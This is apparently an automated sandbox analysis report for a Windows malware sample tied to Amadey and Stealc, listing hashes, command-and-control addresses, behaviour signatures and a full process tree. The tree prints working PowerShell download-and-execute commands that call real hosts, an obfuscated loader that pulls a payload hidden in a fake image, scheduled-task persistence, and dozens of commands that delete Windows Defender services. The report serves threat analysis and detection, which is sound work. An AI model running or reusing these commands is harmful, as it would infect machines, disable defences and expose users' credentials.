Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26/03/2025, 07:13

General

  • Target

    05c8f3700c6327871c199be6417c5c9c.exe

  • Size

    1.9MB

  • MD5

    05c8f3700c6327871c199be6417c5c9c

  • SHA1

    8f4862310762601e271ac27535382d5c7ed740e7

  • SHA256

    18cd20dd8567ce6137508f9dece0571f32741ddaa15d8884ad090a4dce7bab1a

  • SHA512

    76ea3ebcbe8397496a39cb278251839afa966a04a0451891c8300b1a97136b981ba04f903c6f85d83e8724346dda84613a3b99a52c2da4feff72f6d0f35e9bbc

  • SSDEEP

    49152:qsbYVKQjiw4DQIf0XkzgUAkDObQLNuWHxr7+:LRw4EXgObmHx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 14 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 7 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 25 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 14 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 52 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 7 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 59 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\05c8f3700c6327871c199be6417c5c9c.exe
    "C:\Users\Admin\AppData\Local\Temp\05c8f3700c6327871c199be6417c5c9c.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1720
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Users\Admin\AppData\Local\Temp\10338550101\1b53bc2d1c.exe
        "C:\Users\Admin\AppData\Local\Temp\10338550101\1b53bc2d1c.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn j0yxomatRpO /tr "mshta C:\Users\Admin\AppData\Local\Temp\90MNlg9BM.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2136
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn j0yxomatRpO /tr "mshta C:\Users\Admin\AppData\Local\Temp\90MNlg9BM.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2784
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\90MNlg9BM.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SZV6Z28FVXYTI3A8MEQQEPRLMXOSU3CZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3780
            • C:\Users\Admin\AppData\Local\TempSZV6Z28FVXYTI3A8MEQQEPRLMXOSU3CZ.EXE
              "C:\Users\Admin\AppData\Local\TempSZV6Z28FVXYTI3A8MEQQEPRLMXOSU3CZ.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10338560121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:3648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3188
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1240
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2000
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1792
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "0iBq6mao6ze" /tr "mshta \"C:\Temp\qIMBKt6xw.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2952
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\qIMBKt6xw.hta"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3644
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1568
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3192
      • C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe
        "C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2884
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c 67e2ff36de8a3.vbs
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2928
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '…';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4080
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gbkmAkm/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1096
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3560
      • C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3096
        • C:\Users\Admin\AppData\Local\Temp\11.exe
          "C:\Users\Admin\AppData\Local\Temp\11.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2860
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F81B.tmp\F81C.tmp\F81D.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
            5⤵
            PID:5040
            • C:\Users\Admin\AppData\Local\Temp\11.exe
              "C:\Users\Admin\AppData\Local\Temp\11.exe" go
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4272
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F992.tmp\F993.tmp\F994.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                7⤵
                • Drops file in Program Files directory
                PID:2352
                • C:\Windows\system32\sc.exe
                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                  8⤵
                  • Launches sc.exe
                  PID:3592
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:3428
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  8⤵
                  • Delays execution with timeout.exe
                  PID:4364
                • C:\Windows\system32\sc.exe
                  sc stop ddrver
                  8⤵
                  • Launches sc.exe
                  PID:2364
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:3576
                • C:\Windows\system32\takeown.exe
                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:3232
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:4116
                • C:\Windows\system32\sc.exe
                  sc stop "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:2084
                • C:\Windows\system32\sc.exe
                  sc delete "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:1896
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                  8⤵
                  PID:2932
                • C:\Windows\system32\sc.exe
                  sc stop "MDCoreSvc"
                  8⤵
                  • Launches sc.exe
                  PID:4612
                • C:\Windows\system32\sc.exe
                  sc delete "MDCoreSvc"
                  8⤵
                  • Launches sc.exe
                  PID:2152
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                  8⤵
                  PID:2792
                • C:\Windows\system32\sc.exe
                  sc stop "WdNisSvc"
                  8⤵
                  • Launches sc.exe
                  PID:3184
                • C:\Windows\system32\sc.exe
                  sc delete "WdNisSvc"
                  8⤵
                  • Launches sc.exe
                  PID:5064
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                  8⤵
                  PID:4936
                • C:\Windows\system32\sc.exe
                  sc stop "Sense"
                  8⤵
                  • Launches sc.exe
                  PID:3708
                • C:\Windows\system32\sc.exe
                  sc delete "Sense"
                  8⤵
                  • Launches sc.exe
                  PID:2696
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                  8⤵
                  PID:3172
                • C:\Windows\system32\sc.exe
                  sc stop "wscsvc"
                  8⤵
                  • Launches sc.exe
                  PID:4652
                • C:\Windows\system32\sc.exe
                  sc delete "wscsvc"
                  8⤵
                  • Launches sc.exe
                  PID:4840
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                  8⤵
                  • Modifies security service
                  PID:2776
                • C:\Windows\system32\sc.exe
                  sc stop "SgrmBroker"
                  8⤵
                  • Launches sc.exe
                  PID:5044
                • C:\Windows\system32\sc.exe
                  sc delete "SgrmBroker"
                  8⤵
                  • Launches sc.exe
                  PID:224
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                  8⤵
                  PID:4792
                • C:\Windows\system32\sc.exe
                  sc stop "SecurityHealthService"
                  8⤵
                  • Launches sc.exe
                  PID:3640
                • C:\Windows\system32\sc.exe
                  sc delete "SecurityHealthService"
                  8⤵
                  • Launches sc.exe
                  PID:3660
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                  8⤵
                  PID:3196
                • C:\Windows\system32\sc.exe
                  sc stop "webthreatdefsvc"
                  8⤵
                  • Launches sc.exe
                  PID:816
                • C:\Windows\system32\sc.exe
                  sc delete "webthreatdefsvc"
                  8⤵
                  • Launches sc.exe
                  PID:4312
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                  8⤵
                  PID:2592
                • C:\Windows\system32\sc.exe
                  sc stop "webthreatdefusersvc"
                  8⤵
                  • Launches sc.exe
                  PID:2580
                • C:\Windows\system32\sc.exe
                  sc delete "webthreatdefusersvc"
                  8⤵
                  • Launches sc.exe
                  PID:3424
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                  8⤵
                  PID:3356
                • C:\Windows\system32\sc.exe
                  sc stop "WdNisDrv"
                  8⤵
                  • Launches sc.exe
                  PID:1192
                • C:\Windows\system32\sc.exe
                  sc delete "WdNisDrv"
                  8⤵
                  • Launches sc.exe
                  PID:3096
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                  8⤵
                  PID:4608
                • C:\Windows\system32\sc.exe
                  sc stop "WdBoot"
                  8⤵
                  • Launches sc.exe
                  PID:3860
                • C:\Windows\system32\sc.exe
                  sc delete "WdBoot"
                  8⤵
                  • Launches sc.exe
                                      PID:1008
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                      8⤵
                                        PID:3312
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2440
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:3460
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                        8⤵
                                          PID:60
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:4520
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:2884
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                          8⤵
                                            PID:624
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:920
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:5040
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                            8⤵
                                              PID:4916
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:4392
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2256
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                              8⤵
                                                PID:1236
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:3272
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:2552
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                8⤵
                                                  PID:4008
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                  8⤵
                                                    PID:2156
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                    8⤵
                                                      PID:4664
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                      8⤵
                                                        PID:3732
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                        8⤵
                                                          PID:3592
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3876
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3644
                                              • C:\Users\Admin\AppData\Local\Temp\10338710101\32419d60a4.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338710101\32419d60a4.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:3168
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1236
                                              • C:\Users\Admin\AppData\Local\Temp\10338720101\d0e74db0d7.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338720101\d0e74db0d7.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2216
                                              • C:\Users\Admin\AppData\Local\Temp\10338730101\234373e26c.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338730101\234373e26c.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3192
                                              • C:\Users\Admin\AppData\Local\Temp\10338740101\811a208ce2.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338740101\811a208ce2.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:3096
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM firefox.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1192
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM chrome.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3888
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM msedge.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3148
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM opera.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1896
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM brave.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5008
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                  4⤵
                                                    PID:5088
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                      5⤵
                                                      • Drops desktop.ini file(s)
